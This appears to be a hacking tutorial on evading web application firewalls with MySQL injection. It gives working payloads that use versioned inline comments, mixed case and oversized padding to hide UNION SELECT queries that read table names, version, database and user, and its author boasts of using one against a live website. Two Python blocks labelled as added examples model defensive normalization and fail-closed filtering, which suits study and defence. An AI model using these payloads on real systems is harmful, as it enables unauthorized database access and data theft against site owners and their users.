MySQL injection with Bypassing WAF:
Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query. Some comments in SQL:

//, -- , /**/, #, --+, -- -, ;
Case Changing:

Some WAFs filter keywords like /union\select/ig. We can bypass this filter by using inline comments most of the time. More complex examples will require a more advanced approach, like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point: /*!code*/ is MySQL's conditional comment syntax, so the MySQL server executes the SQL inside it while a parser that only knows ordinary comments sees nothing but a comment.
Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example:

id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -
This bypass above works. I myself just used this against a Web site recently.
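The two requests above get past a filter because the rule is matched against the raw parameter while MySQL reads the comment-stripped text. The following added example (not code from the post) shows the defensive fix: rewrite the value the way MySQL's parser will see it (decode `+`, keep the body of `/*! ... */`, drop ordinary comments and anything after `--` or `#`) and run the rules on both the raw and the normalized form. The rule names and the regexes are assumptions; the two sample inputs are constructed from the requests shown in the post.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the original post. Rule names are assumed;
# "union_select" models the /union\select/ig style filter the post mentions.
RULES = {
    "union_select": re.compile(r"union\s+select", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
}

_VERSIONED = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.S)  # /*!code*/ or /*!50000 code*/
_BLOCK = re.compile(r"/\*.*?\*/", re.S)                   # ordinary /* ... */ comment
_LINE = re.compile(r"(--[\s-]|#).*$", re.M)              # '-- x', '-- -', '--+' (decoded), '# x'


def normalize(value: str) -> str:
    """Rewrite a parameter value the way MySQL's parser will read it."""
    s = unquote_plus(value)          # '+' and %xx become literal characters
    s = _VERSIONED.sub(r" \1 ", s)   # MySQL executes the body of /*! ... */
    s = _BLOCK.sub(" ", s)           # every other comment is just whitespace
    s = _LINE.sub(" ", s)            # everything after -- or # is dropped
    return re.sub(r"\s+", " ", s).strip().lower()


def naive_hits(value: str) -> set:
    """Rules that fire on the raw value only (the weak matching the post exploits)."""
    return {name for name, rule in RULES.items() if rule.search(value)}


def hits(value: str) -> set:
    """Rules that fire on the raw value or on its normalized form."""
    normalized = normalize(value)
    return {name for name, rule in RULES.items()
            if rule.search(value) or rule.search(normalized)}


# Constructed inputs, taken from the two requests shown in the post.
SPLIT_UNION = "1/*!UnIoN*/SeLeCT"
SPLIT_SCHEMA = ("1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables"
                " /*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -")

if __name__ == "__main__":
    for v in (SPLIT_UNION, SPLIT_SCHEMA, "1"):
        print(repr(v), "->", repr(normalize(v)),
              "| raw only:", naive_hits(v), "| raw+normalized:", hits(v))
```

Matching on both forms matters: `/*information_schema*/` is an ordinary comment, so normalization removes it and only the raw check still sees the literal keyword, while `/*!UnIoN*/SeLeCT` is only caught once the versioned comment has been unwrapped.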
Buffer Overflow / Unexpected input:

A lot of WAFs are written in the C language, making them prone to overflow or to act differently when loaded with a bunch of data. Here is a WAF that does its job correctly, but when given a large amount of data allows the malicious request and response.
id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+
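The padded request above only works if the WAF stops looking before it reaches the keywords. The following added example (not code from the post) models that behaviour in Python rather than C: a WAF that scans only the first `INSPECT_LIMIT` bytes of a parameter fails open on a padded value, while one that rejects anything larger than its window, or that scans the whole value, does not. The limit, the rule and the padded input are assumptions constructed for the demonstration.

```python
import re

# Added example, not part of the original post. The rule and the window
# size are assumptions chosen for the demonstration.
UNION_SELECT = re.compile(r"union\s+select", re.I)
INSPECT_LIMIT = 512   # assumed: bytes of a parameter the hypothetical WAF scans


def padded_payload(pad: int) -> str:
    """Constructed input modelled on the post's padded UNION request."""
    return "1 and (select 1)=(select 0x" + "A" * pad + ") union select 1,2,version()"


def truncating_waf(value: str) -> bool:
    """Blocks only if the rule fires inside the window: padding pushes the
    keywords past it and the request is waved through (fails open)."""
    return bool(UNION_SELECT.search(value[:INSPECT_LIMIT]))


def bounded_waf(value: str) -> bool:
    """Fails closed: a value larger than the window is rejected outright,
    everything else is matched in full."""
    if len(value) > INSPECT_LIMIT:
        return True
    return bool(UNION_SELECT.search(value))


def full_scan_waf(value: str) -> bool:
    """No window at all: the whole value is matched, whatever its size."""
    return bool(UNION_SELECT.search(value))


if __name__ == "__main__":
    for pad in (10, 1000):
        v = padded_payload(pad)
        print(f"pad={pad:4d} len={len(v):5d}",
              "truncating:", truncating_waf(v),
              "bounded:", bounded_waf(v),
              "full scan:", full_scan_waf(v))
```

Whichever policy is chosen, the blocked-or-allowed decision should be logged together with the value's length, since a sudden run of oversized parameters is itself a useful detection signal.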